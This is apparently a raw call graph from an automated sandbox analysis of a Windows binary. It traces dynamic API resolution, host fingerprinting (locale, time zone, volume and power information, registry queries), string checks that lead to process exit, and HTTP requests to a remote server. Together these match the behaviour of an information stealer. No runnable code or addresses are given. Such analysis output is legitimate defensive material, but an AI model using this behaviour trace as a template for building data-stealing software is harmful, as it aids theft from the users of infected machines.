14049->14050 14051 123b1d 14050->14051 14052 1245c0 2 API calls 14051->14052 14053 123b36 14052->14053 14054 1245c0 2 API calls 14053->14054 14055 123b4f 14054->14055 14056 1245c0 2 API calls 14055->14056 14057 123b68 14056->14057 14058 1245c0 2 API calls 14057->14058 14059 123b81 14058->14059 14060 1245c0 2 API calls 14059->14060 14061 123b9a 14060->14061 14062 1245c0 2 API calls 14061->14062 14063 123bb3 14062->14063 14064 1245c0 2 API calls 14063->14064 14065 123bcc 14064->14065 14066 1245c0 2 API calls 
14065->14066 14067 123be5 14066->14067 14068 1245c0 2 API calls 14067->14068 14069 123bfe 14068->14069 14070 1245c0 2 API calls 14069->14070 14071 123c17 14070->14071 14072 1245c0 2 API calls 14071->14072 14073 123c30 14072->14073 14074 1245c0 2 API calls 14073->14074 14075 123c49 14074->14075 14076 1245c0 2 API calls 14075->14076 14077 123c62 14076->14077 14078 1245c0 2 API calls 14077->14078 14079 123c7b 14078->14079 14080 1245c0 2 API calls 14079->14080 14081 123c94 14080->14081 14082 1245c0 2 API calls 14081->14082 14083 123cad 14082->14083 14084 1245c0 2 API calls 14083->14084 14085 123cc6 14084->14085 14086 1245c0 2 API calls 14085->14086 14087 123cdf 14086->14087 14088 1245c0 2 API calls 14087->14088 14089 123cf8 14088->14089 14090 1245c0 2 API calls 14089->14090 14091 123d11 14090->14091 14092 1245c0 2 API calls 14091->14092 14093 123d2a 14092->14093 14094 1245c0 2 API calls 14093->14094 14095 123d43 14094->14095 14096 1245c0 2 API calls 14095->14096 14097 123d5c 14096->14097 14098 1245c0 2 API calls 14097->14098 14099 123d75 14098->14099 14100 1245c0 2 API calls 14099->14100 14101 123d8e 14100->14101 14102 1245c0 2 API calls 14101->14102 14103 123da7 14102->14103 14104 1245c0 2 API calls 14103->14104 14105 123dc0 14104->14105 14106 1245c0 2 API calls 14105->14106 14107 123dd9 14106->14107 14108 1245c0 2 API calls 14107->14108 14109 123df2 14108->14109 14110 1245c0 2 API calls 14109->14110 14111 123e0b 14110->14111 14112 1245c0 2 API calls 14111->14112 14113 123e24 14112->14113 14114 1245c0 2 API calls 14113->14114 14115 123e3d 14114->14115 14116 1245c0 2 API calls 14115->14116 14117 123e56 14116->14117 14118 1245c0 2 API calls 14117->14118 14119 123e6f 14118->14119 14120 1245c0 2 API calls 14119->14120 14121 123e88 14120->14121 14122 1245c0 2 API calls 14121->14122 14123 123ea1 14122->14123 14124 1245c0 2 API calls 14123->14124 14125 123eba 14124->14125 14126 1245c0 2 API calls 14125->14126 14127 123ed3 14126->14127 14128 1245c0 2 API calls 14127->14128 
14129 123eec 14128->14129 14130 1245c0 2 API calls 14129->14130 14131 123f05 14130->14131 14132 1245c0 2 API calls 14131->14132 14133 123f1e 14132->14133 14134 1245c0 2 API calls 14133->14134 14135 123f37 14134->14135 14136 1245c0 2 API calls 14135->14136 14137 123f50 14136->14137 14138 1245c0 2 API calls 14137->14138 14139 123f69 14138->14139 14140 1245c0 2 API calls 14139->14140 14141 123f82 14140->14141 14142 1245c0 2 API calls 14141->14142 14143 123f9b 14142->14143 14144 1245c0 2 API calls 14143->14144 14145 123fb4 14144->14145 14146 1245c0 2 API calls 14145->14146 14147 123fcd 14146->14147 14148 1245c0 2 API calls 14147->14148 14149 123fe6 14148->14149 14150 1245c0 2 API calls 14149->14150 14151 123fff 14150->14151 14152 1245c0 2 API calls 14151->14152 14153 124018 14152->14153 14154 1245c0 2 API calls 14153->14154 14155 124031 14154->14155 14156 1245c0 2 API calls 14155->14156 14157 12404a 14156->14157 14158 1245c0 2 API calls 14157->14158 14159 124063 14158->14159 14160 1245c0 2 API calls 14159->14160 14161 12407c 14160->14161 14162 1245c0 2 API calls 14161->14162 14163 124095 14162->14163 14164 1245c0 2 API calls 14163->14164 14165 1240ae 14164->14165 14166 1245c0 2 API calls 14165->14166 14167 1240c7 14166->14167 14168 1245c0 2 API calls 14167->14168 14169 1240e0 14168->14169 14170 1245c0 2 API calls 14169->14170 14171 1240f9 14170->14171 14172 1245c0 2 API calls 14171->14172 14173 124112 14172->14173 14174 1245c0 2 API calls 14173->14174 14175 12412b 14174->14175 14176 1245c0 2 API calls 14175->14176 14177 124144 14176->14177 14178 1245c0 2 API calls 14177->14178 14179 12415d 14178->14179 14180 1245c0 2 API calls 14179->14180 14181 124176 14180->14181 14182 1245c0 2 API calls 14181->14182 14183 12418f 14182->14183 14184 1245c0 2 API calls 14183->14184 14185 1241a8 14184->14185 14186 1245c0 2 API calls 14185->14186 14187 1241c1 14186->14187 14188 1245c0 2 API calls 14187->14188 14189 1241da 14188->14189 14190 1245c0 2 API calls 14189->14190 14191 1241f3 
14190->14191 14192 1245c0 2 API calls 14191->14192 14193 12420c 14192->14193 14194 1245c0 2 API calls 14193->14194 14195 124225 14194->14195 14196 1245c0 2 API calls 14195->14196 14197 12423e 14196->14197 14198 1245c0 2 API calls 14197->14198 14199 124257 14198->14199 14200 1245c0 2 API calls 14199->14200 14201 124270 14200->14201 14202 1245c0 2 API calls 14201->14202 14203 124289 14202->14203 14204 1245c0 2 API calls 14203->14204 14205 1242a2 14204->14205 14206 1245c0 2 API calls 14205->14206 14207 1242bb 14206->14207 14208 1245c0 2 API calls 14207->14208 14209 1242d4 14208->14209 14210 1245c0 2 API calls 14209->14210 14211 1242ed 14210->14211 14212 1245c0 2 API calls 14211->14212 14213 124306 14212->14213 14214 1245c0 2 API calls 14213->14214 14215 12431f 14214->14215 14216 1245c0 2 API calls 14215->14216 14217 124338 14216->14217 14218 1245c0 2 API calls 14217->14218 14219 124351 14218->14219 14220 1245c0 2 API calls 14219->14220 14221 12436a 14220->14221 14222 1245c0 2 API calls 14221->14222 14223 124383 14222->14223 14224 1245c0 2 API calls 14223->14224 14225 12439c 14224->14225 14226 1245c0 2 API calls 14225->14226 14227 1243b5 14226->14227 14228 1245c0 2 API calls 14227->14228 14229 1243ce 14228->14229 14230 1245c0 2 API calls 14229->14230 14231 1243e7 14230->14231 14232 1245c0 2 API calls 14231->14232 14233 124400 14232->14233 14234 1245c0 2 API calls 14233->14234 14235 124419 14234->14235 14236 1245c0 2 API calls 14235->14236 14237 124432 14236->14237 14238 1245c0 2 API calls 14237->14238 14239 12444b 14238->14239 14240 1245c0 2 API calls 14239->14240 14241 124464 14240->14241 14242 1245c0 2 API calls 14241->14242 14243 12447d 14242->14243 14244 1245c0 2 API calls 14243->14244 14245 124496 14244->14245 14246 1245c0 2 API calls 14245->14246 14247 1244af 14246->14247 14248 1245c0 2 API calls 14247->14248 14249 1244c8 14248->14249 14250 1245c0 2 API calls 14249->14250 14251 1244e1 14250->14251 14252 1245c0 2 API calls 14251->14252 14253 1244fa 14252->14253 
14254 1245c0 2 API calls 14253->14254 14255 124513 14254->14255 14256 1245c0 2 API calls 14255->14256 14257 12452c 14256->14257 14258 1245c0 2 API calls 14257->14258 14259 124545 14258->14259 14260 1245c0 2 API calls 14259->14260 14261 12455e 14260->14261 14262 1245c0 2 API calls 14261->14262 14263 124577 14262->14263 14264 1245c0 2 API calls 14263->14264 14265 124590 14264->14265 14266 1245c0 2 API calls 14265->14266 14267 1245a9 14266->14267 14268 139c10 14267->14268 14269 139c20 43 API calls 14268->14269 14270 13a036 8 API calls 14268->14270 14269->14270 14271 13a146 14270->14271 14272 13a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14270->14272 14273 13a153 8 API calls 14271->14273 14274 13a216 14271->14274 14272->14271 14273->14274 14275 13a298 14274->14275 14276 13a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14274->14276 14277 13a337 14275->14277 14278 13a2a5 6 API calls 14275->14278 14276->14275 14279 13a344 9 API calls 14277->14279 14280 13a41f 14277->14280 14278->14277 14279->14280 14281 13a4a2 14280->14281 14282 13a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14280->14282 14283 13a4ab GetProcAddress GetProcAddress 14281->14283 14284 13a4dc 14281->14284 14282->14281 14283->14284 14285 13a515 14284->14285 14286 13a4e5 GetProcAddress GetProcAddress 14284->14286 14287 13a612 14285->14287 14288 13a522 10 API calls 14285->14288 14286->14285 14289 13a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14287->14289 14290 13a67d 14287->14290 14288->14287 14289->14290 14291 13a686 GetProcAddress 14290->14291 14292 13a69e 14290->14292 14291->14292 14293 13a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14293 14294 135ca3 14292->14294 14293->14294 14295 121590 14294->14295 15414 121670 14295->15414 14298 13a7a0 lstrcpy 14299 1215b5 14298->14299 14300 13a7a0 lstrcpy 14299->14300 14301 1215c7 14300->14301 14302 13a7a0 lstrcpy 
14301->14302 14303 1215d9 14302->14303 14304 13a7a0 lstrcpy 14303->14304 14305 121663 14304->14305 14306 135510 14305->14306 14307 135521 14306->14307 14308 13a820 2 API calls 14307->14308 14309 13552e 14308->14309 14310 13a820 2 API calls 14309->14310 14311 13553b 14310->14311 14312 13a820 2 API calls 14311->14312 14313 135548 14312->14313 14314 13a740 lstrcpy 14313->14314 14315 135555 14314->14315 14316 13a740 lstrcpy 14315->14316 14317 135562 14316->14317 14318 13a740 lstrcpy 14317->14318 14319 13556f 14318->14319 14320 13a740 lstrcpy 14319->14320 14332 13557c 14320->14332 14321 13a8a0 lstrcpy 14321->14332 14322 135643 StrCmpCA 14322->14332 14323 1356a0 StrCmpCA 14324 1357dc 14323->14324 14323->14332 14326 13a8a0 lstrcpy 14324->14326 14325 13a7a0 lstrcpy 14325->14332 14327 1357e8 14326->14327 14328 13a820 2 API calls 14327->14328 14330 1357f6 14328->14330 14329 1351f0 20 API calls 14329->14332 14333 13a820 2 API calls 14330->14333 14331 135856 StrCmpCA 14331->14332 14334 135991 14331->14334 14332->14321 14332->14322 14332->14323 14332->14325 14332->14329 14332->14331 14337 121590 lstrcpy 14332->14337 14341 13a740 lstrcpy 14332->14341 14342 13a820 lstrlen lstrcpy 14332->14342 14343 1352c0 25 API calls 14332->14343 14345 135a0b StrCmpCA 14332->14345 14357 13578a StrCmpCA 14332->14357 14359 13593f StrCmpCA 14332->14359 14336 135805 14333->14336 14335 13a8a0 lstrcpy 14334->14335 14338 13599d 14335->14338 14339 121670 lstrcpy 14336->14339 14337->14332 14340 13a820 2 API calls 14338->14340 14360 135811 14339->14360 14344 1359ab 14340->14344 14341->14332 14342->14332 14343->14332 14346 13a820 2 API calls 14344->14346 14347 135a16 Sleep 14345->14347 14348 135a28 14345->14348 14349 1359ba 14346->14349 14347->14332 14350 13a8a0 lstrcpy 14348->14350 14352 121670 lstrcpy 14349->14352 14351 135a34 14350->14351 14353 13a820 2 API calls 14351->14353 14352->14360 14354 135a43 14353->14354 14355 13a820 2 API calls 14354->14355 14356 135a52 14355->14356 14358 121670 lstrcpy 
14356->14358 14357->14332 14358->14360 14359->14332 14360->13413 14362 137553 GetVolumeInformationA 14361->14362 14363 13754c 14361->14363 14364 137591 14362->14364 14363->14362 14365 1375fc GetProcessHeap RtlAllocateHeap 14364->14365 14366 137619 14365->14366 14367 137628 wsprintfA 14365->14367 14368 13a740 lstrcpy 14366->14368 14369 13a740 lstrcpy 14367->14369 14370 135da7 14368->14370 14369->14370 14370->13434 14372 13a7a0 lstrcpy 14371->14372 14373 124899 14372->14373 15423 1247b0 14373->15423 14375 1248a5 14376 13a740 lstrcpy 14375->14376 14377 1248d7 14376->14377 14378 13a740 lstrcpy 14377->14378 14379 1248e4 14378->14379 14380 13a740 lstrcpy 14379->14380 14381 1248f1 14380->14381 14382 13a740 lstrcpy 14381->14382 14383 1248fe 14382->14383 14384 13a740 lstrcpy 14383->14384 14385 12490b InternetOpenA StrCmpCA 14384->14385 14386 124944 14385->14386 14387 124ecb InternetCloseHandle 14386->14387 15429 138b60 14386->15429 14389 124ee8 14387->14389 15445 129ac0 CryptStringToBinaryA 14389->15445 14390 124963 15437 13a920 14390->15437 14394 124976 14395 13a8a0 lstrcpy 14394->14395 14400 12497f 14395->14400 14396 13a820 2 API calls 14397 124f05 14396->14397 14398 13a9b0 4 API calls 14397->14398 14401 124f1b 14398->14401 14399 124f27 ctype 14402 13a7a0 lstrcpy 14399->14402 14404 13a9b0 4 API calls 14400->14404 14403 13a8a0 lstrcpy 14401->14403 14415 124f57 14402->14415 14403->14399 14405 1249a9 14404->14405 14406 13a8a0 lstrcpy 14405->14406 14407 1249b2 14406->14407 14408 13a9b0 4 API calls 14407->14408 14409 1249d1 14408->14409 14410 13a8a0 lstrcpy 14409->14410 14411 1249da 14410->14411 14412 13a920 3 API calls 14411->14412 14413 1249f8 14412->14413 14414 13a8a0 lstrcpy 14413->14414 14416 124a01 14414->14416 14415->13437 14417 13a9b0 4 API calls 14416->14417 14418 124a20 14417->14418 14419 13a8a0 lstrcpy 14418->14419 14420 124a29 14419->14420 14421 13a9b0 4 API calls 14420->14421 14422 124a48 14421->14422 14423 13a8a0 lstrcpy 14422->14423 14424 124a51 14423->14424 
14425 13a9b0 4 API calls 14424->14425 14426 124a7d 14425->14426 14427 13a920 3 API calls 14426->14427 14428 124a84 14427->14428 14429 13a8a0 lstrcpy 14428->14429 14430 124a8d 14429->14430 14431 124aa3 InternetConnectA 14430->14431 14431->14387 14432 124ad3 HttpOpenRequestA 14431->14432 14434 124b28 14432->14434 14435 124ebe InternetCloseHandle 14432->14435 14436 13a9b0 4 API calls 14434->14436 14435->14387 14437 124b3c 14436->14437 14438 13a8a0 lstrcpy 14437->14438 14439 124b45 14438->14439 14440 13a920 3 API calls 14439->14440 14441 124b63 14440->14441 14442 13a8a0 lstrcpy 14441->14442 14443 124b6c 14442->14443 14444 13a9b0 4 API calls 14443->14444 14445 124b8b 14444->14445 14446 13a8a0 lstrcpy 14445->14446 14447 124b94 14446->14447 14448 13a9b0 4 API calls 14447->14448 14449 124bb5 14448->14449 14450 13a8a0 lstrcpy 14449->14450 14451 124bbe 14450->14451 14452 13a9b0 4 API calls 14451->14452 14453 124bde 14452->14453 14454 13a8a0 lstrcpy 14453->14454 14455 124be7 14454->14455 14456 13a9b0 4 API calls 14455->14456 14457 124c06 14456->14457 14458 13a8a0 lstrcpy 14457->14458 14459 124c0f 14458->14459 14460 13a920 3 API calls 14459->14460 14461 124c2d 14460->14461 14462 13a8a0 lstrcpy 14461->14462 14463 124c36 14462->14463 14464 13a9b0 4 API calls 14463->14464 14465 124c55 14464->14465 14466 13a8a0 lstrcpy 14465->14466 14467 124c5e 14466->14467 14468 13a9b0 4 API calls 14467->14468 14469 124c7d 14468->14469 14470 13a8a0 lstrcpy 14469->14470 14471 124c86 14470->14471 14472 13a920 3 API calls 14471->14472 14473 124ca4 14472->14473 14474 13a8a0 lstrcpy 14473->14474 14475 124cad 14474->14475 14476 13a9b0 4 API calls 14475->14476 14477 124ccc 14476->14477 14478 13a8a0 lstrcpy 14477->14478 14479 124cd5 14478->14479 14480 13a9b0 4 API calls 14479->14480 14481 124cf6 14480->14481 14482 13a8a0 lstrcpy 14481->14482 14483 124cff 14482->14483 14484 13a9b0 4 API calls 14483->14484 14485 124d1f 14484->14485 14486 13a8a0 lstrcpy 14485->14486 14487 124d28 14486->14487 14488 13a9b0 4 
API calls 14487->14488 14489 124d47 14488->14489 14490 13a8a0 lstrcpy 14489->14490 14491 124d50 14490->14491 14492 13a920 3 API calls 14491->14492 14493 124d6e 14492->14493 14494 13a8a0 lstrcpy 14493->14494 14495 124d77 14494->14495 14496 13a740 lstrcpy 14495->14496 14497 124d92 14496->14497 14498 13a920 3 API calls 14497->14498 14499 124db3 14498->14499 14500 13a920 3 API calls 14499->14500 14501 124dba 14500->14501 14502 13a8a0 lstrcpy 14501->14502 14503 124dc6 14502->14503 14504 124de7 lstrlen 14503->14504 14505 124dfa 14504->14505 14506 124e03 lstrlen 14505->14506 15443 13aad0 14506->15443 14509 124e32 InternetReadFile 14510 124e67 InternetCloseHandle 14509->14510 14515 124e5e 14509->14515 14513 13a800 14510->14513 14512 13a9b0 4 API calls 14512->14515 14513->14435 14514 13a8a0 lstrcpy 14514->14515 14515->14509 14515->14510 14515->14512 14515->14514 14517 13aad0 14516->14517 14518 1317c4 StrCmpCA 14517->14518 14519 1317cf ExitProcess 14518->14519 14530 1317d7 14518->14530 14520 1319c2 14520->13439 14521 131913 StrCmpCA 14521->14530 14522 131932 StrCmpCA 14522->14530 14523 1318f1 StrCmpCA 14523->14530 14524 131951 StrCmpCA 14524->14530 14525 131970 StrCmpCA 14525->14530 14526 13187f StrCmpCA 14526->14530 14527 13185d StrCmpCA 14527->14530 14528 1318cf StrCmpCA 14528->14530 14529 1318ad StrCmpCA 14529->14530 14530->14520 14530->14521 14530->14522 14530->14523 14530->14524 14530->14525 14530->14526 14530->14527 14530->14528 14530->14529 14531 13a820 lstrlen lstrcpy 14530->14531 14531->14530 14533 13a7a0 lstrcpy 14532->14533 14534 125979 14533->14534 14535 1247b0 2 API calls 14534->14535 14536 125985 14535->14536 14537 13a740 lstrcpy 14536->14537 14538 1259ba 14537->14538 14539 13a740 lstrcpy 14538->14539 14540 1259c7 14539->14540 14541 13a740 lstrcpy 14540->14541 14542 1259d4 14541->14542 14543 13a740 lstrcpy 14542->14543 14544 1259e1 14543->14544 14545 13a740 lstrcpy 14544->14545 14546 1259ee InternetOpenA StrCmpCA 14545->14546 14547 125a1d 14546->14547 14548 
125fc3 InternetCloseHandle 14547->14548 14549 138b60 3 API calls 14547->14549 14550 125fe0 14548->14550 14551 125a3c 14549->14551 14553 129ac0 4 API calls 14550->14553 14552 13a920 3 API calls 14551->14552 14554 125a4f 14552->14554 14555 125fe6 14553->14555 14556 13a8a0 lstrcpy 14554->14556 14557 13a820 2 API calls 14555->14557 14560 12601f ctype 14555->14560 14562 125a58 14556->14562 14558 125ffd 14557->14558 14559 13a9b0 4 API calls 14558->14559 14561 126013 14559->14561 14564 13a7a0 lstrcpy 14560->14564 14563 13a8a0 lstrcpy 14561->14563 14565 13a9b0 4 API calls 14562->14565 14563->14560 14573 12604f 14564->14573 14566 125a82 14565->14566 14567 13a8a0 lstrcpy 14566->14567 14568 125a8b 14567->14568 14569 13a9b0 4 API calls 14568->14569 14570 125aaa 14569->14570 14571 13a8a0 lstrcpy 14570->14571 14572 125ab3 14571->14572 14574 13a920 3 API calls 14572->14574 14573->13445 14575 125ad1 14574->14575 14576 13a8a0 lstrcpy 14575->14576 14577 125ada 14576->14577 14578 13a9b0 4 API calls 14577->14578 14579 125af9 14578->14579 14580 13a8a0 lstrcpy 14579->14580 14581 125b02 14580->14581 14582 13a9b0 4 API calls 14581->14582 14583 125b21 14582->14583 14584 13a8a0 lstrcpy 14583->14584 14585 125b2a 14584->14585 14586 13a9b0 4 API calls 14585->14586 14587 125b56 14586->14587 14588 13a920 3 API calls 14587->14588 14589 125b5d 14588->14589 14590 13a8a0 lstrcpy 14589->14590 14591 125b66 14590->14591 14592 125b7c InternetConnectA 14591->14592 14592->14548 14593 125bac HttpOpenRequestA 14592->14593 14595 125fb6 InternetCloseHandle 14593->14595 14596 125c0b 14593->14596 14595->14548 14597 13a9b0 4 API calls 14596->14597 14598 125c1f 14597->14598 14599 13a8a0 lstrcpy 14598->14599 14600 125c28 14599->14600 14601 13a920 3 API calls 14600->14601 14602 125c46 14601->14602 14603 13a8a0 lstrcpy 14602->14603 14604 125c4f 14603->14604 14605 13a9b0 4 API calls 14604->14605 14606 125c6e 14605->14606 14607 13a8a0 lstrcpy 14606->14607 14608 125c77 14607->14608 14609 13a9b0 4 API calls 14608->14609 
14610 125c98 14609->14610 14611 13a8a0 lstrcpy 14610->14611 14612 125ca1 14611->14612 14613 13a9b0 4 API calls 14612->14613 14614 125cc1 14613->14614 14615 13a8a0 lstrcpy 14614->14615 14616 125cca 14615->14616 14617 13a9b0 4 API calls 14616->14617 14618 125ce9 14617->14618 14619 13a8a0 lstrcpy 14618->14619 14620 125cf2 14619->14620 14621 13a920 3 API calls 14620->14621 14622 125d10 14621->14622 14623 13a8a0 lstrcpy 14622->14623 14624 125d19 14623->14624 14625 13a9b0 4 API calls 14624->14625 14626 125d38 14625->14626 14627 13a8a0 lstrcpy 14626->14627 14628 125d41 14627->14628 14629 13a9b0 4 API calls 14628->14629 14630 125d60 14629->14630 14631 13a8a0 lstrcpy 14630->14631 14632 125d69 14631->14632 14633 13a920 3 API calls 14632->14633 14634 125d87 14633->14634 14635 13a8a0 lstrcpy 14634->14635 14636 125d90 14635->14636 14637 13a9b0 4 API calls 14636->14637 14638 125daf 14637->14638 14639 13a8a0 lstrcpy 14638->14639 14640 125db8 14639->14640 14641 13a9b0 4 API calls 14640->14641 14642 125dd9 14641->14642 14643 13a8a0 lstrcpy 14642->14643 14644 125de2 14643->14644 14645 13a9b0 4 API calls 14644->14645 14646 125e02 14645->14646 14647 13a8a0 lstrcpy 14646->14647 14648 125e0b 14647->14648 14649 13a9b0 4 API calls 14648->14649 14650 125e2a 14649->14650 14651 13a8a0 lstrcpy 14650->14651 14652 125e33 14651->14652 14653 13a920 3 API calls 14652->14653 14654 125e54 14653->14654 14655 13a8a0 lstrcpy 14654->14655 14656 125e5d 14655->14656 14657 125e70 lstrlen 14656->14657 14658 13aad0 14657->14658 14659 125e81 lstrlen GetProcessHeap RtlAllocateHeap 14658->14659 14660 13aad0 14659->14660 14661 125eae lstrlen 14660->14661 14662 125ebe 14661->14662 14663 125ed7 lstrlen 14662->14663 14664 125ee7 14663->14664 14665 125ef0 lstrlen 14664->14665 14666 125f04 14665->14666 14667 125f1a lstrlen 14666->14667 14668 13aad0 14667->14668 14669 125f2a HttpSendRequestA 14668->14669 14670 125f35 InternetReadFile 14669->14670 14671 125f6a InternetCloseHandle 14670->14671 14675 125f61 14670->14675 
14671->14595 14673 13a9b0 4 API calls 14673->14675 14674 13a8a0 lstrcpy 14674->14675 14675->14670 14675->14671 14675->14673 14675->14674 14679 131077 14676->14679 14677 131151 14677->13447 14678 13a820 lstrlen lstrcpy 14678->14679 14679->14677 14679->14678 14681 130db7 14680->14681 14682 130f17 14681->14682 14683 130e27 StrCmpCA 14681->14683 14684 130e67 StrCmpCA 14681->14684 14685 130ea4 StrCmpCA 14681->14685 14686 13a820 lstrlen lstrcpy 14681->14686 14682->13455 14683->14681 14684->14681 14685->14681 14686->14681 14688 130f67 14687->14688 14689 130fb2 StrCmpCA 14688->14689 14690 131044 14688->14690 14691 13a820 lstrlen lstrcpy 14688->14691 14689->14688 14690->13463 14691->14688 14693 13a740 lstrcpy 14692->14693 14694 131a26 14693->14694 14695 13a9b0 4 API calls 14694->14695 14696 131a37 14695->14696 14697 13a8a0 lstrcpy 14696->14697 14698 131a40 14697->14698 14699 13a9b0 4 API calls 14698->14699 14700 131a5b 14699->14700 14701 13a8a0 lstrcpy 14700->14701 14702 131a64 14701->14702 14703 13a9b0 4 API calls 14702->14703 14704 131a7d 14703->14704 14705 13a8a0 lstrcpy 14704->14705 14706 131a86 14705->14706 14707 13a9b0 4 API calls 14706->14707 14708 131aa1 14707->14708 14709 13a8a0 lstrcpy 14708->14709 14710 131aaa 14709->14710 14711 13a9b0 4 API calls 14710->14711 14712 131ac3 14711->14712 14713 13a8a0 lstrcpy 14712->14713 14714 131acc 14713->14714 14715 13a9b0 4 API calls 14714->14715 14716 131ae7 14715->14716 14717 13a8a0 lstrcpy 14716->14717 14718 131af0 14717->14718 14719 13a9b0 4 API calls 14718->14719 14720 131b09 14719->14720 14721 13a8a0 lstrcpy 14720->14721 14722 131b12 14721->14722 14723 13a9b0 4 API calls 14722->14723 14724 131b2d 14723->14724 14725 13a8a0 lstrcpy 14724->14725 14726 131b36 14725->14726 14727 13a9b0 4 API calls 14726->14727 14728 131b4f 14727->14728 14729 13a8a0 lstrcpy 14728->14729 14730 131b58 14729->14730 14731 13a9b0 4 API calls 14730->14731 14732 131b76 14731->14732 14733 13a8a0 lstrcpy 14732->14733 14734 131b7f 14733->14734 14735 
137500 6 API calls 14734->14735 14736 131b96 14735->14736 14737 13a920 3 API calls 14736->14737 14738 131ba9 14737->14738 14739 13a8a0 lstrcpy 14738->14739 14740 131bb2 14739->14740 14741 13a9b0 4 API calls 14740->14741 14742 131bdc 14741->14742 14743 13a8a0 lstrcpy 14742->14743 14744 131be5 14743->14744 14745 13a9b0 4 API calls 14744->14745 14746 131c05 14745->14746 14747 13a8a0 lstrcpy 14746->14747 14748 131c0e 14747->14748 15450 137690 GetProcessHeap RtlAllocateHeap 14748->15450 14751 13a9b0 4 API calls 14752 131c2e 14751->14752 14753 13a8a0 lstrcpy 14752->14753 14754 131c37 14753->14754 14755 13a9b0 4 API calls 14754->14755 14756 131c56 14755->14756 14757 13a8a0 lstrcpy 14756->14757 14758 131c5f 14757->14758 14759 13a9b0 4 API calls 14758->14759 14760 131c80 14759->14760 14761 13a8a0 lstrcpy 14760->14761 14762 131c89 14761->14762 15457 1377c0 GetCurrentProcess IsWow64Process 14762->15457 14765 13a9b0 4 API calls 14766 131ca9 14765->14766 14767 13a8a0 lstrcpy 14766->14767 14768 131cb2 14767->14768 14769 13a9b0 4 API calls 14768->14769 14770 131cd1 14769->14770 14771 13a8a0 lstrcpy 14770->14771 14772 131cda 14771->14772 14773 13a9b0 4 API calls 14772->14773 14774 131cfb 14773->14774 14775 13a8a0 lstrcpy 14774->14775 14776 131d04 14775->14776 14777 137850 3 API calls 14776->14777 14778 131d14 14777->14778 14779 13a9b0 4 API calls 14778->14779 14780 131d24 14779->14780 14781 13a8a0 lstrcpy 14780->14781 14782 131d2d 14781->14782 14783 13a9b0 4 API calls 14782->14783 14784 131d4c 14783->14784 14785 13a8a0 lstrcpy 14784->14785 14786 131d55 14785->14786 14787 13a9b0 4 API calls 14786->14787 14788 131d75 14787->14788 14789 13a8a0 lstrcpy 14788->14789 14790 131d7e 14789->14790 14791 1378e0 3 API calls 14790->14791 14792 131d8e 14791->14792 14793 13a9b0 4 API calls 14792->14793 14794 131d9e 14793->14794 14795 13a8a0 lstrcpy 14794->14795 14796 131da7 14795->14796 14797 13a9b0 4 API calls 14796->14797 14798 131dc6 14797->14798 14799 13a8a0 lstrcpy 14798->14799 14800 131dcf 
14799->14800 14801 13a9b0 4 API calls 14800->14801 14802 131df0 14801->14802 14803 13a8a0 lstrcpy 14802->14803 14804 131df9 14803->14804 15459 137980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14804->15459 14807 13a9b0 4 API calls 14808 131e19 14807->14808 14809 13a8a0 lstrcpy 14808->14809 14810 131e22 14809->14810 14811 13a9b0 4 API calls 14810->14811 14812 131e41 14811->14812 14813 13a8a0 lstrcpy 14812->14813 14814 131e4a 14813->14814 14815 13a9b0 4 API calls 14814->14815 14816 131e6b 14815->14816 14817 13a8a0 lstrcpy 14816->14817 14818 131e74 14817->14818 15461 137a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14818->15461 14821 13a9b0 4 API calls 14822 131e94 14821->14822 14823 13a8a0 lstrcpy 14822->14823 14824 131e9d 14823->14824 14825 13a9b0 4 API calls 14824->14825 14826 131ebc 14825->14826 14827 13a8a0 lstrcpy 14826->14827 14828 131ec5 14827->14828 14829 13a9b0 4 API calls 14828->14829 14830 131ee5 14829->14830 14831 13a8a0 lstrcpy 14830->14831 14832 131eee 14831->14832 15464 137b00 GetUserDefaultLocaleName 14832->15464 14835 13a9b0 4 API calls 14836 131f0e 14835->14836 14837 13a8a0 lstrcpy 14836->14837 14838 131f17 14837->14838 14839 13a9b0 4 API calls 14838->14839 14840 131f36 14839->14840 14841 13a8a0 lstrcpy 14840->14841 14842 131f3f 14841->14842 14843 13a9b0 4 API calls 14842->14843 14844 131f60 14843->14844 14845 13a8a0 lstrcpy 14844->14845 14846 131f69 14845->14846 15468 137b90 14846->15468 14848 131f80 14849 13a920 3 API calls 14848->14849 14850 131f93 14849->14850 14851 13a8a0 lstrcpy 14850->14851 14852 131f9c 14851->14852 14853 13a9b0 4 API calls 14852->14853 14854 131fc6 14853->14854 14855 13a8a0 lstrcpy 14854->14855 14856 131fcf 14855->14856 14857 13a9b0 4 API calls 14856->14857 14858 131fef 14857->14858 14859 13a8a0 lstrcpy 14858->14859 14860 131ff8 14859->14860 15480 137d80 GetSystemPowerStatus 14860->15480 14863 13a9b0 4 API calls 14864 132018 14863->14864 14865 13a8a0 lstrcpy 14864->14865 14866 132021 14865->14866 14867 
13a9b0 4 API calls 14866->14867 14868 132040 14867->14868 14869 13a8a0 lstrcpy 14868->14869 14870 132049 14869->14870 14871 13a9b0 4 API calls 14870->14871 14872 13206a 14871->14872 14873 13a8a0 lstrcpy 14872->14873 14874 132073 14873->14874 14875 13207e GetCurrentProcessId 14874->14875 15482 139470 OpenProcess 14875->15482 14878 13a920 3 API calls 14879 1320a4 14878->14879 14880 13a8a0 lstrcpy 14879->14880 14881 1320ad 14880->14881 14882 13a9b0 4 API calls 14881->14882 14883 1320d7 14882->14883 14884 13a8a0 lstrcpy 14883->14884 14885 1320e0 14884->14885 14886 13a9b0 4 API calls 14885->14886 14887 132100 14886->14887 14888 13a8a0 lstrcpy 14887->14888 14889 132109 14888->14889 15487 137e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14889->15487 14892 13a9b0 4 API calls 14893 132129 14892->14893 14894 13a8a0 lstrcpy 14893->14894 14895 132132 14894->14895 14896 13a9b0 4 API calls 14895->14896 14897 132151 14896->14897 14898 13a8a0 lstrcpy 14897->14898 14899 13215a 14898->14899 14900 13a9b0 4 API calls 14899->14900 14901 13217b 14900->14901 14902 13a8a0 lstrcpy 14901->14902 14903 132184 14902->14903 15491 137f60 14903->15491 14906 13a9b0 4 API calls 14907 1321a4 14906->14907 14908 13a8a0 lstrcpy 14907->14908 14909 1321ad 14908->14909 14910 